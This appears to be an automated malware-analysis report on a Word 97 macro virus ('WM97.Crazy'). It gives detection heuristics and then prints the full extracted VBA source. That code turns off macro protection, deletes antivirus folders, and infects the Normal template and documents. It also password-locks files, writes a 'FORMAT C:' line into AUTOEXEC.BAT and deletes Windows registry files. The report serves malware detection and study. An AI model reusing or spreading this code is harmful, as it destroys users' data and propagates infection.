Verdict: MALICIOUS
Risk Score: 260
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
This document contains legacy WordBasic and VBA macros designed to disable macro security and delete menu items related to macro management. The AutoOpen macro attempts to delete security-related menu items and then calls AutoClose, which tries to infect the Normal template and the active document with the 'Crazy' macro. It also attempts to delete files from common antivirus installation directories. The presence of legacy WordBasic markers and the specific macro names suggest an older, but still functional, malicious document.
Heuristics (5)
- ClamAV: Doc.Trojan.Crazy-4 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Crazy-4
- Legacy WordBasic macro-virus markers (high, OLE_LEGACY_WORDBASIC_MACRO_VIRUS): OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
- VBA macros detected (medium, 2 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Auto_Close macro (high, OLE_VBA_AUTOCLOSE): Auto_Close macro
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11381 bytes |

SHA-256: b7f44b4fb97b3f6c8199d4224a10e7bed0de73914f03b30502d4fa9de1c25945
Detection: ClamAV: Doc.Trojan.Crazy-4
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Crazy"
Sub AutoOpen()
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
On Error GoTo Crazy
CommandBars("tools").Controls("Macro").Delete
CommandBars("tools").Controls("Customize...").Delete
CommandBars("tools").Controls("Templates and add-ins...").Delete
WordBasic.FileSummaryInfo Author:="Crazy by ULTRAS"
Kill "C:\Program Files\AntiViral Toolkit Pro\*.*"
Kill "C:\f-macro\*.*"
Kill "C:\Program Files\McAfee\VirusScan\*.*"
Kill "C:\Program Files\Norton AntiVirus\*.*"
Kill "C:\VDOC\*.*"
Call AutoClose
Call Crazy
Crazy:
End Sub
Sub AutoClose()
On Error GoTo Crazy
Application.ScreenUpdating = False
Application.DisplayAlerts = wdAlertsNone
Application.UserName = "ULTRAS"
Application.UserInitials = "Crazy"
Set GlobalDoc = NormalTemplate
Set ActiveDoc = ActiveDocument
GlobalInfect = No
DocumentInfect = No
For u = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(u).Name = "Crazy" Then
GlobalInfect = Yes
End If
Next
For w = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(w).Name = "Crazy" Then
DocumentInfect = Yes
End If
Next
If GlobalInfect = No Then
Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="Crazy", Object:=wdOrganizerObjectProjectItems
Options.SaveNormalPrompt = False
End If
If DocumentInfect = No Then
Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="Crazy", Object:=wdOrganizerObjectProjectItems
ActiveDoc.SaveAs FileName:=ActiveDoc.Name, FileFormat:=wdFormatTemplate
End If
Application.DisplayAlerts = wdAlertsAll
Call Crazy
Crazy:
End Sub
Sub FileSave()
On Error GoTo Crazy
ActiveDocument.Password = "ULTRAS"
ActiveDocument.Save
Crazy:
End Sub
Sub FileSaveAs()
Dialogs(wdDialogFileSaveAs).Show
On Error GoTo Crazy
Set ULTRAS = ActiveDocument.Range(Start:=0, End:=0)
With ULTRAS
.InsertBefore "CRAZY BY ULTRAS"
.Font.Size = 50
.Font.Name = "Impact"
.Font.ColorIndex = 3
.Font.Shadow = 1
.Font.Animation = 2
End With
Crazy:
End Sub
Sub Crazy()
On Error GoTo Crazy
If Day(Now()) = 5 Then
MsgBox "You Infected WM97.Crazy by ULTRAS", vbCritical + vbOKOnly, "ULTRAS"
ActiveDocument.Password = "Crazy"
ActiveDocument.Save
End If
If Day(Now()) = 19 Then
Open "C:\AUTOEXEC.BAT" For Input As #1
Close
SetAttr "C:\AUTOEXEC.BAT", vbNormal
Open "C:\AUTOEXEC.BAT" For Append As #1
Print #1, "@ECHO OFF"
Print #1, "CLS"
Print #1, "ECHO Please wait..."
Print #1, "FORMAT C: /U /C /S /AUTOTEST > NUL"
Close #1
SetAttr "C:\AUTOEXEC.BAT", vbReadOnly
End If
If Day(Now()) = 27 Then
MsgBox "You Infected WM97.Crazy by ULTRAS", vbCritical + vbOKOnly, "ULTRAS"
SetAttr "C:\Windows\user.da0", 0
Kill "C:\Windows\user.da0"
SetAttr "C:\Windows\system.da0", 0
Kill "C:\Windows\system.da0"
SetAttr "C:\Windows\user.dat", 0
Kill "C:\Windows\user.dat"
SetAttr "C:\Windows\system.dat", 0
Kill "C:\Windows\system.dat"
End If
Crazy:
End Sub
' Processing file: /opt/analyzer/scan_staging/dac08855b9624e7da0d33e1d9637f68a.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 903 bytes
' Macros/VBA/Crazy - 6139 bytes
' Line #0:
' FuncDefn (Sub AutoOpen())
' Line #1:
' LitDI2 0x0000
' Ld WordBasic
' ArgsMemCall DisableAutoMacros 0x0001
' Line #2:
' LitVarSpecial (False)
' Ld Options
' MemSt VirusProtection
' Line #3:
' OnError Crazy
' Line #4:
' LitStr 0x0005 "Macro"
' LitStr 0x0005 "tools"
' ArgsLd CommandBars 0x0001
' ArgsMemLd Controls 0x0001
' ArgsMemCall Delete 0x0000
' Line #5:
' LitStr 0x000C "Customize..."
' LitStr 0x0005 "tools"
' ArgsLd CommandBars 0x0001
' ArgsMemLd Controls 0x0001
' ArgsMemCall D
... (truncated)